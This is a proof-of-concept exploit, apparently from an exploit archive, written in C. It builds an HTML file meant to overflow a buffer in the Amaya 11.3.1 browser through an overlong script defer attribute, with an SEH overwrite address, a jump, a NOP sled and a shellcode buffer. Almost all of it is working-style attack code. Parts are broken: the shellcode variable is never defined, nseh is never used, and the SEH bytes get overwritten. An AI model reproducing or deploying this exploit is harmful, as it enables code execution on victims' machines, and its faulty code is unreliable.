Amaya version 11.3.1 remote buffer overflow proof of concept exploit.
4d3d211fc71e047e923473d9df15698aa896aae81c8d409b32b69d47e1ed3fec
#include<stdio.h>
/*Amaya 11.3.1(dec 9 2009) remote buffer overflow(poc)*/
unsigned int seh=0x7C902783; ;
char nseh[]="\xeb\x04\x90\x90";
void gen_random(char *s, const int len)
{ int i;
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
for(i=0;i<len;i++)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
char html[]="<script defer=\"";
char end[]="\">";
int main(){
FILE*f=fopen("shit.html","wb");
char buffer[100000];
fwrite(html,1,sizeof(html)-1,f);
gen_random(buffer,12996);
memcpy(buffer+11266,&seh,4);
memcpy(buffer+11262,seh,4);
memset(buffer+11266,0x90,10);
memcpy(buffer+11276,calc,strlen(calc));
fwrite(buffer,1,12996,f);
fwrite(end,1,sizeof(end)-1,f);
fclose(f);
printf("done");
getchar();
return 0;
}